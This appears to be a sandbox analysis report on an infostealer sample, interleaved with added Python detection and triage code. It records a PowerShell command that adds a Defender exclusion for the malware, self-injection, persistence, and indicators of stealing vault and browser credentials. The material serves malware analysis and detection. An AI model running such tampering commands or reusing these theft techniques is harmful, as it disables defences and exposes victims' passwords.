                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000000.00000002.1760927897.00000000053C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMML.dll2 vs PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000000.00000002.1761794847.0000000005F60000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000000.00000000.1718033193.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameLrBtUp.exeF vs PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000000.00000002.1756670007.0000000003E37000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename44f18827-ac02-496c-beb3-f0922f952617.exe4 vs PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000000.00000002.1753991456.000000000101E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000000.00000002.1755288317.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMML.dll2 vs PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000000.00000002.1755288317.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename44f18827-ac02-496c-beb3-f0922f952617.exe4 vs PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000004.00000002.4180312206.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Binary or memory string: OriginalFilenameLrBtUp.exeF vs PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
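The rows above compare the OriginalFilename field of the version resource (LrBtUp.exe) with the lure-style name the sample was delivered under. The following is an added triage example, not code from the report or from the sample: it extracts every OriginalFilename value from a file or memory dump by walking the documented VS_VERSIONINFO String layout (UTF-16LE key, NUL, DWORD padding, UTF-16LE value) without any third-party PE library, and flags values that do not match the on-disk name. The blob it scans is constructed here; the sample name is the one from this report.

```python
"""Pull OriginalFilename out of a PE's version resource without pefile and
compare it with the name the file runs under.

Added triage example, not code from the report or the sample. It relies
only on the documented VS_VERSIONINFO String layout: UTF-16LE key
"OriginalFilename", NUL terminator, 0 or 2 bytes of DWORD padding, then a
NUL-terminated UTF-16LE value. The input below is constructed."""
import struct
from typing import List

KEY = "OriginalFilename".encode("utf-16-le") + b"\x00\x00"


def _string_entry(key: str, value: str) -> bytes:
    """Build one VS_VERSIONINFO 'String' structure: wLength, wValueLength
    (in WCHARs incl. NUL), wType=1 (text), szKey, DWORD padding, Value."""
    key_b = key.encode("utf-16-le") + b"\x00\x00"
    val_b = value.encode("utf-16-le") + b"\x00\x00"
    head = 6 + len(key_b)
    pad = b"\x00" * ((4 - head % 4) % 4)
    return struct.pack("<HHH", head + len(pad) + len(val_b), len(value) + 1, 1) + key_b + pad + val_b


def extract_original_filenames(data: bytes) -> List[str]:
    """Every OriginalFilename value in `data`. A memory dump carries several
    (the sample's own plus those of mapped DLLs such as clr.dll), which is
    why the report lists clr.dll and MML.dll alongside LrBtUp.exe."""
    found, pos = [], 0
    while True:
        pos = data.find(KEY, pos)
        if pos < 0:
            return found
        cur = pos + len(KEY)
        if data[cur:cur + 2] == b"\x00\x00":   # DWORD padding (an empty value would be misread)
            cur += 2
        end = cur
        while end + 1 < len(data) and data[end:end + 2] != b"\x00\x00":
            end += 2
        found.append(data[cur:end].decode("utf-16-le", errors="replace"))
        pos = end


def name_mismatch(on_disk_name: str, data: bytes) -> List[str]:
    """OriginalFilename values that differ from the on-disk name
    (case-insensitive). Renaming is routine in sandboxes, but a build
    name like LrBtUp.exe under an invoice-style lure name is worth a look."""
    return [n for n in extract_original_filenames(data) if n.lower() != on_disk_name.lower()]


# Constructed input: junk plus three version-resource String entries.
SAMPLE_BLOB = (b"MZ" + b"\x90" * 30
               + _string_entry("InternalName", "LrBtUp.exe")
               + _string_entry("OriginalFilename", "LrBtUp.exe")
               + _string_entry("ProductName", "LrBtUp")
               + b"\x00" * 16)

SAMPLE_NAME = "PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"

if __name__ == "__main__":
    print(extract_original_filenames(SAMPLE_BLOB))
    print(name_mismatch(SAMPLE_NAME, SAMPLE_BLOB))
```

Run it against a full process dump rather than the file on disk and you get the same multi-valued list the report shows (clr.dll, MML.dll, the GUID-named inner assembly), so filter out well-known runtime DLL names before treating a mismatch as a finding.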
Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 6.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.ctsdvwT.exe.3a630e0.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.ctsdvwT.exe.3a630e0.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.ctsdvwT.exe.3a284c0.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e72b80.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.ctsdvwT.exe.3cc9990.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e72b80.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.ctsdvwT.exe.3cc9990.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.ctsdvwT.exe.3a284c0.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.53c0000.5.raw.unpack, JwlrlmCCKvmG8rWaC9.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.raw.unpack, KLhJmaON.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.raw.unpack, KLhJmaON.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.raw.unpack, 7hO8luD.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.raw.unpack, 7hO8luD.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.raw.unpack, 7hO8luD.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.raw.unpack, 7hO8luD.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.raw.unpack, 9HIFdl.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.raw.unpack, 9HIFdl.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, utfVXMWZH8mR5jCuu6.cs | Security API names: _0020.SetAccessControl
Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, utfVXMWZH8mR5jCuu6.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, utfVXMWZH8mR5jCuu6.cs | Security API names: _0020.AddAccessRule
Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, TDUwymQgqk3Z3KoOJH.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, utfVXMWZH8mR5jCuu6.cs | Security API names: _0020.SetAccessControl
Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, utfVXMWZH8mR5jCuu6.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, utfVXMWZH8mR5jCuu6.cs | Security API names: _0020.AddAccessRule
Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, TDUwymQgqk3Z3KoOJH.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, TDUwymQgqk3Z3KoOJH.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, utfVXMWZH8mR5jCuu6.cs | Security API names: _0020.SetAccessControl
Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, utfVXMWZH8mR5jCuu6.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, utfVXMWZH8mR5jCuu6.cs | Security API names: _0020.AddAccessRule
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@17/9@4/1
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.log
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7000:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Mutant created: \Sessions\1\BaseNamedObjects\cHxCTwTuL
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3748:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m3tzu3xt.1xd.ps1
Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000004.00000002.4186061604.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000006.00000002.1935883302.0000000002968000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000C.00000002.4184465405.00000000032F8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
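Two groups of rows above point at the same kind of evidence: the INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID matches on the unpacked payloads, and the Chromium Login Data DDL (CREATE TABLE password_notes ...) found in the process memory of both the sample and ctsdvwT.exe. Every one of those hits is in an unpacked or in-memory .NET image, where string literals are stored as UTF-16LE, so a scanner that only looks for ASCII never sees them. The block below is an added example serving both groups of rows; it is not the ditekSHen rule and not sandbox code. The vault schema GUIDs in it are my assumption, taken from public Windows Credential Manager listings (verify them against the rule you actually deploy); the DDL marker is the string the report quotes; the buffer it scans is constructed.

```python
"""Scan a buffer for the credential-theft string indicators behind this
report's YARA rows (VaultSchemaGUID) and its password_notes memory string,
in both ASCII and UTF-16LE.

Added example; not the ditekSHen rule and not sandbox code. The vault
schema GUIDs are my assumption, taken from public Credential Manager
listings; verify them against the rule you deploy. The DDL marker is the
string the report quotes. The buffer scanned below is constructed."""
import re
from typing import Dict, List

VAULT_SCHEMA_GUIDS = {
    "2F1A6504-0641-44CF-8BB5-3612D865F2E5": "vault: Windows Secure Note",
    "3E0E35BE-1B77-43E7-B873-AED901B6275B": "vault: Windows Web Password Credential",
    "4BF4C442-9B8A-41A0-B380-DD4A704DDB28": "vault: Web Credentials",
    "77BC582B-F0A6-4E15-4E80-61736B6F3B29": "vault: Windows Credentials",
}
BROWSER_DB_MARKERS = {
    "CREATE TABLE password_notes": "Chromium 'Login Data' schema (password_notes)",
    "CREATE TABLE logins": "Chromium 'Login Data' schema (logins)",
}
INDICATORS = {**VAULT_SCHEMA_GUIDS, **BROWSER_DB_MARKERS}


def _needles(text: str, encodings) -> Dict[str, bytes]:
    # .NET string literals live in the #US heap as UTF-16LE, so a rule or a
    # `strings` pass that only looks for ASCII never sees them.
    out = {}
    if "ascii" in encodings:
        out["ascii"] = text.encode("ascii")
    if "wide" in encodings:
        out["wide"] = text.encode("utf-16-le")
    return out


def scan(data: bytes, encodings=("ascii", "wide")) -> List[dict]:
    """One hit per (indicator, encoding, offset); case-insensitive, so
    brace-wrapped or lower-cased GUIDs still match."""
    hits = []
    for text, label in INDICATORS.items():
        for enc, needle in _needles(text, encodings).items():
            for m in re.finditer(re.escape(needle), data, re.IGNORECASE):
                hits.append({"indicator": text, "label": label,
                             "encoding": enc, "offset": m.start()})
    return sorted(hits, key=lambda h: (h["offset"], h["indicator"]))


def labels(hits: List[dict]) -> List[str]:
    """Distinct capability labels, the way a triage note would list them."""
    return sorted({h["label"] for h in hits})


def _constructed_dotnet_blob() -> bytes:
    """Looks like an unpacked .NET payload: wide strings only, junk around them."""
    return b"".join([
        b"\x00" * 8,
        "{3E0E35BE-1B77-43E7-B873-AED901B6275B}".encode("utf-16-le"),
        b"\x00" * 4,
        "CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT".encode("utf-16-le"),
        b"\xff" * 8,
    ])


SAMPLE = _constructed_dotnet_blob()

if __name__ == "__main__":
    print("ascii only:", scan(SAMPLE, encodings=("ascii",)))
    for h in scan(SAMPLE):
        print(h)
```

Running the ASCII-only pass over the constructed blob returns nothing; the wide pass returns both indicators. That is the whole reason the report's matches land on the `.unpack` images and `.sdmp` dumps rather than on the packed file: the same strings are there, just two bytes per character.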
Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | ReversingLabs: Detection: 71%
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | File read: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
Source: unknown | Process created: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Process created: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Process created: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Process created: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Process created: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
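The process rows above carry three detectable patterns: PowerShell spawned by the sample to run Add-MpPreference -ExclusionPath against its own path, the sample and later ctsdvwT.exe each spawning a second copy of their own image (the self-injection step that precedes the unpacked payloads), and the persistence copy executing from a self-named folder under AppData\Roaming. The block below is an added example that encodes those three checks as detection logic over Sysmon Event ID 1-style records; it is not Joe Sandbox code and not the Sigma rule the report cites. The events are constructed by hand from the report's rows, not captured telemetry, and the list of -EncodedCommand abbreviations it decodes is a common subset rather than every prefix PowerShell accepts.

```python
"""Detection logic for the process chain in this report, run over
constructed Sysmon-style process-creation events.

Added example; not Joe Sandbox code and not the Sigma rule the report
cites. Field names follow Sysmon Event ID 1 (Image, ParentImage,
CommandLine). The events are built by hand from the report's rows, not
captured telemetry; the -EncodedCommand prefix list is a common subset."""
import base64
import re
from pathlib import PureWindowsPath
from typing import Dict, List, Optional

# Add-/Set-MpPreference with any exclusion switch (path, process, extension).
MP_TAMPER = re.compile(r"(?i)\b(?:add|set)-mppreference\b.*?-exclusion(?:path|process|extension)")
# -e / -ec / -en / -enc / -EncodedCommand followed by a base64 token.
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})")
PS_IMAGE = re.compile(r"(?i)\\(?:powershell|pwsh)\.exe$")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode a -EncodedCommand payload (base64 of UTF-16LE) if present."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", "ignore")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def analyze(event: Dict[str, str]) -> List[str]:
    """Names of the detections that fire for one process-creation event."""
    findings = []
    image, parent, cmd = event["Image"], event["ParentImage"], event["CommandLine"]

    # 1) Defender exclusion added from PowerShell, plain or base64-encoded.
    if PS_IMAGE.search(image):
        effective = decode_encoded_command(cmd) or cmd
        if MP_TAMPER.search(effective):
            findings.append("defender_exclusion_tamper")

    # 2) A process whose parent is its own image: the self-injection
    #    pattern the report shows twice for the sample and for ctsdvwT.exe.
    if image.lower() == parent.lower():
        findings.append("self_spawn")

    # 3) Executable under the roaming profile, in a folder named after
    #    itself (ctsdvwT\ctsdvwT.exe): copy-to-AppData persistence.
    p = PureWindowsPath(image)
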